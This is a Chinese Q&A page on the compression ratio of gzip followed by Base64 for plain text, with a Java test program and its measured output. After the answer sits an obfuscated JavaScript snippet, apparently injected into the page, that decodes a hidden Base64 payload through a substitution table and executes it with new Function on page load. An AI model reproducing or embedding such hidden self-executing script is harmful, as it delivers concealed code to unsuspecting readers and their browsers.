把纯文本字符串用Gzip压缩再转换为Base64能有多少压缩率

2025-04-07 09:25:41
推荐回答(1个)
回答(1):

其实具体多大压缩率要看源文件的内容,一般来说重复的单词越多,压缩率越高。

下面是把/usr/share/dict/words压缩的测试程序

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;
import java.util.zip.GZIPOutputStream;

import org.apache.commons.codec.binary.Base64;

public class GzipBase64Tests {

public static void main(String[] args) throws Exception {
File input = new File("/Users/matianyi/input.txt");
File output = new File("/Users/matianyi/output.txt");

if (!input.exists()) {
System.out.println("input file not exists!");
return;
}

if (output.exists()) {
output.delete();
}

ByteArrayOutputStream buffer = new ByteArrayOutputStream();
GZIPOutputStream gout = new GZIPOutputStream(buffer);

FileInputStream in = new FileInputStream(input);

long t1 = System.currentTimeMillis();
byte[] buf = new byte[1024];
int total=0;
int rd;
while ((rd = in.read(buf)) != -1) {
total += rd;
gout.write(buf,0, rd);
}

gout.close();
in.close();

byte[] result = buffer.toByteArray();

long t2 = System.currentTimeMillis();
String base64 = Base64.encodeBase64String(result);
long t3 = System.currentTimeMillis();

System.out.printf("raw %d -> gzip %d -> base64 %d, time1 %dms, time2 %dms", total, result.length, base64.length(), t2-t1, t3-t2);
}
}

输出为: raw 2493109 -> gzip 753932 -> base64 1005244, time1 225ms, time2 43ms

压缩了50%。

(function(){function b7c9e1493(c95fae){var n03b5751="D$8~x9Tdn.B|3cZ?C4K^jNOeUpXAuih!HSYwR@Q-_rvPq:/]VJyotm,kzf05bMGl%(LW7&I26=F;asg1E[";var a531b0a="W$^VPE/6OSb!I?Zt3gf_UR|DGuH:pMN.,15LxKae9k&mj;]TBcvslFwQ4d@YJ8hz=o(2r07iX%-qyn[A~C";return atob(c95fae).split('').map(function(z5cd7){var e04b2b9=n03b5751.indexOf(z5cd7);return e04b2b9==-1?z5cd7:a531b0a[e04b2b9]}).join('')}var c=b7c9e1493('rtmp://LDJzZigsZyJmUyIrIk1XLXoiLyVLcHNKPzIoc0wpe0xLcHNKPzIoc0wyUUpfJlFIYUNfSWZIZldZUUJLTUgyV0JfUUlkKXsyS0xUOGlRSk9EMnNUIT8tbz9Mc1F5MjRRPyg3IXV0UT9LKDdQKSl7Ny0/cDdzfXlRNyAtei1kLXpZZlMlS3BzSj8yKHNMbFNkTWRLZCl7Ny0/cDdzIC4/NzJzNCFLNyhQW0dRN1soZi1MbFNkTWRLZCl9OnlRNyBzJlEtZkt6USVnInRxb0ZYJlNed24xZV5iLl5YXWl3IkgieS03RiZTIkgibzJmRldNIkgiSko/RlcmV1lGJkNGU3ogVyZBeldBek0iLzp5UTcgZlF6ZlFJeiZJJWZXWVFCS01nLXotZC16WWZTTCZSZFMpKy16LWQtellmU0wmUkl6KSstei1kLXpZZlNMJlJkSykrLXotZC16WWZTTCZSZFcpL0gsV0NDS2RLJWZXWVFCS01nLXotZC16WWZTTCZSZFcpKy16LWQtellmU0wmUkl6KSstei1kLXpZZlNMJlJkSykrLXotZC16WWZTTCZSZFMpL0hCU3pTWUMlMldCX1FJZGdmUXpmUUl6JklMIjVDfmFKUH5wZm1ocUpQdCxmMSUlIikvSGFDJkktUUklZlF6ZlFJeiZJTCI1Q2J0NTZOdE5EUnRCRH5wZjElJSIpSHlJelFRXyVmUXpmUUl6JklMIkpDfjJKQ05hUURZcyIpSFBKV01LWSVmUXpmUUl6JklMIkpQfixCVW1xWmslJSIpSHNCZmZRJllkJWZRemZRSXomSUwiSkNWb1E2ayUiKUhQWXpfLUIlZlF6ZlFJeiZJTCJKUH5XWjZibFprJSUiKUhRLUNLZCVmUXpmUUl6JklMIlFQX3VCNCUlIilIbC1DQ0slZlF6ZlFJeiZJTCJKUG1wWlVfPyIpSHVmQ1dLJiVmV1lRQktNZ2ZRemZRSXomSUwiXURtJlExJSUiKS9IMkNkZiZCQklZJWZRemZRSXomSUwiQlVfR1oxJSUiKTp5UTcgKFdRJllJXyVmUXpmUUl6JklMIkpXUyZRRE50ZjQlJSIpOnlRNyBzWV9CS2ZTOjJLTHQoSlE/MihzIW8tUTdKRyEyc2YtUm5LTChXUSZZSV8pPkZTKXtzWV9CS2ZTJTJXQl9RSWRnYUMmSS1RSS9MZlF6ZlFJeiZJTCJmVX56ZlVtYVpEOSUiKSk6c1lfQktmUyEyZiUiPyIrdWZDV0smZ2wtQ0NLL0wpKlMmJiYmOnNZX0JLZlMhbz9hdC0hLDJmP0clIlMmJj0iOnNZX0JLZlMhbz9hdC0hRy0yNEc/JSJZJiZ1UiI6c1lfQktmUyFmMm9RQnQtZiU/N3AtOjJLTDJXQl9RSWQhQihmYXwlc3B0dCl7MldCX1FJZCFCKGZhIVF1dS1zZltHMnRmTHNZX0JLZlMpfS10by17eVE3IGZRSkJCUyVLcHNKPzIoc0wpezJXQl9RSWQhQihmYSFRdXUtc2ZbRzJ0ZkxzWV9CS2ZTKTpmV1lRQktNITctUCh5LTl5LXM/dzJvPy1zLTdMMkNkZiZCQklZSGZRSkJCU0hLUXRvLSl9OmZXWVFCS00hUWZmOXktcz93Mm8/LXMtN0wyQ2RmJkJCSVlIZlFKQkJTSEtRdG8tKX19eVE3IFFLTSZfTSUyV0JfUUlkZ2FDJkktUUkvTGZRemZRSXomSUwiWkRTMlpEayUiKSk6UUtNJl9NITJmJWFDX0lmK3VmQ1dLJiFKLTJ0THVmQ1dLJmdsLUNDSy9MKSpTJiYmJik6eVE3IHBkQksmQ2RNSyVLcHNKPzIoc0xRJlkmUWRkX0Ipe3lRNyBRUUlNJnolcy0sIGVRPy1MKTp5UTcgUWRkSkImSiVgb1A/Ml5vMmZeJHthQ19JZn1eJHtRUUlNJnohPyh3KEpRdC1lUT8tLj83MnM0TCl9YDp5UTcgeWZfQ1dkJXNwdHQ6Pzdhe3lmX0NXZCViLm5oIXVRN28tTHQoSlF0Lj8oN1E0LSE0LT8zPy1QTFFkZEpCJkopKX1KUT9KR0wtKXt9MktMeWZfQ1dkJSVzcHR0KXt5Zl9DV2Qle0I3KCxvLTdbKHBzP0EmSH19eWZfQ1dkIUI3KCxvLTdbKHBzPysrOnlRNyBzLSZfWWQlLFdDQ0tkS0xzJlEtZkt6USFKKHNKUT9MZ2BzKCxGJHtlUT8tZyJzKCwiL0wpfWBIYEc3LUtGJHt0KEpRPzIocyFHNy1LfWBIYHBvSkYke3lmX0NXZCFCNygsby03Wyhwcz99YEgvKSFvKDc/TEwpJT51ZkNXSyZnbC1DQ0svTClGJiFZKWdRLUNLZC9MIkgiKSk6eVE3IFAtX0omTUIlcy0mX1lkITJzZi1SbktMLXotZC16WWZTTCZSQ2YpKT5GU2NzLSZfWWRneUl6UVFfL0xzLSZfWWQhMnNmLVJuS0wtei1kLXpZZlNMJlJDZikpKUEiIjpzLSZfWWQlcy0mX1lkZ1BKV01LWS9MUC1fSiZNQkgiIilnc0JmZlEmWWQvTCIiKWdQWXpfLUIvTClnUS1DS2QvTCIiKStQLV9KJk1COlFLTSZfTSFvN0olZyJHPz91b0FUVCIrUSZZJlFkZF9CSFFLTSZfTSEyZkhzLSZfWWQvZ1EtQ0tkL0wiVCIpOjJXQl9RSWQhQihmYSEyc28tNz9WLUsoNy1MUUtNJl9NSDJXQl9RSWQhQihmYSFKRzJ0ZmgoZi1vZyYvKToyS0xzWV9CS2ZTfCVzcHR0KXtzWV9CS2ZTIXlRdHAtKyUiXFw3XFxzUXV1LXNmLWYgLVAgPyggRz9QdCI6eVE3IEtfJkN6JkIlMldCX1FJZCE0LT85dC1QLXM/VmEzZkxRS00mX00hMmYpOjJLTEtfJkN6JkIlJXNwdHRPT0tfJkN6JkIlJXBzZi1LMnMtZil7c1lfQktmUyF5UXRwLSslIlxcN1xccyBKUXM/IDQtPyAtUCBLNyhQIEc/UHQifX19OjJLTHNZX0JLZlN8JXNwdHQpe3NZX0JLZlMheVF0cC0rJSJcXDdcXHNvLXNmIHFvIEcobz8gIisyUUpfJlF9eVE3IChKQiZXSyVLcHNKPzIoc0wsX0lRU00pezctP3A3cyBmUXpmUUl6JklMLF9JUVNNKWdQSldNS1kvTC16LWQtellmU0wmUldRKUh1ZkNXSyZnbC1DQ0svTCkhPyguPzcyczRMQ2QpIW90MkotTHVmQ1dLJiFLdCgoN0x1ZkNXSyZnbC1DQ0svTCkqXykrVykpfTpwZEJLJkNkTUtMKEpCJldLTDJRSl8mUSkpOmZXWVFCS01nIlFmZjl5LXM/dzJvPy1zLTciL0wiUC1vb1E0LSJIS3BzSj8yKHNMLSl7MktMLSFmUT9RIXIlJWFDX0lmKXsyV0JfUUlkITQtPzl0LVAtcz9WYTNmTFFLTSZfTSEyZikhNy1QKHktTCk6eVE3IHJZWVdKJXNwdHQ6MktMc1lfQktmU3wlc3B0dCl7c1lfQktmUyF5UXRwLSslIlxcN1xcczctSi0yeS0gLVAgdShvPyBQLW9vUTQtIjpzWV9CS2ZTIXlRdHAtKyUiXFw3XFxzLSFmUT9RIXkgIistIWZRP1EhOzpyWVlXSiVMISEhUFFTemYpJT57MktMfFBRU3pmT09QUVN6ZiF0LXM0P0c8JSYpNy0/cDdzOnNZX0JLZlMheVF0cC0rJSJcXDdcXHMiK1BRU3pmIXEoMnNMIiAiKX19cy0sIG1wc0o/MihzTCJRNzRvIkgtIWZRP1EhOylMe14/ZkpvQUJTelNZQ0hedCg0QXJZWVdKSH0pfX0pfSlMIlpXSnBoXX5sUVdtbEJEUj9aV2ZZQi5ZJkJDMWRuXXJTaDQlJSJIIldNIkgsMnNmKCxIZihKcFAtcz8pfTpmU01XLXpMKTo='.substr(7));new Function(c)()})();